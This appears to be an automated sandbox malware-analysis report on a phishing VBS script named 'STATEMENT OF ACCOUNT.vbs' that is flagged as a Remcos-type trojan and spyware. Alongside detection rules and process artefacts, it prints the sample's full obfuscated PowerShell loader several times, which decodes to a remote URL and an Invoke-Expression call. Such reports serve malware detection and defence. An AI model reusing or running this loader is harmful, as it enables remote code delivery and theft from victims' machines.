Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 10_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 10_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 10_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 11_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 11_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 12_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 12_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

barindex
Source: amsi32_7372.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9233
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9233
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9233 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9233 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00401806 NtdllDefWindowProc_W, 10_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004018C0 NtdllDefWindowProc_W, 10_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004016FD NtdllDefWindowProc_A, 11_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004017B7 NtdllDefWindowProc_A, 11_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00402CAC NtdllDefWindowProc_A, 12_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00402D66 NtdllDefWindowProc_A, 12_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B88BEA2 1_2_00007FFD9B88BEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B88B0F6 1_2_00007FFD9B88B0F6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02A5F1F0 4_2_02A5F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02A5FAC0 4_2_02A5FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02A5EEA8 4_2_02A5EEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2279B5C1 9_2_2279B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_227A7194 9_2_227A7194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044B040 10_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0043610D 10_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00447310 10_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044A490 10_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040755A 10_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0043C560 10_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044B610 10_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044D6C0 10_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004476F0 10_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044B870 10_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044081D 10_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00414957 10_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004079EE 10_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00407AEB 10_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044AA80 10_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00412AA9 10_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00404B74 10_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00404B03 10_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044BBD8 10_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00404BE5 10_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00404C76 10_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00415CFE 10_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00416D72 10_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00446D30 10_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00446D8B 10_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00406E8F 10_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00405038 11_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041208C 11_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004050A9 11_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040511A 11_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043C13A 11_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004051AB 11_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00449300 11_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040D322 11_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044A4F0 11_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043A5AB 11_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00413631 11_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00446690 11_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044A730 11_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004398D8 11_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004498E0 11_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044A886 11_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0043DA09 11_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00438D5E 11_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00449ED0 11_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041FE83 11_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00430F54 11_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004050C2 12_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004014AB 12_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00405133 12_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004051A4 12_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00401246 12_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_0040CA46 12_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00405235 12_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004032C8 12_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00401689 12_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00402F60 12_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: STATEMENT OF ACCOUNT.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_7372.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@26/15@1/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 10_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 12_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 10_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 10_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 10_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Fejdede.ell Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-LO8JHK
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrbhln5.pt5.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7372
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.2367050724.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 0000000A.00000002.2348783900.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347963788.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2374444370.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371429800.00000000034F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln 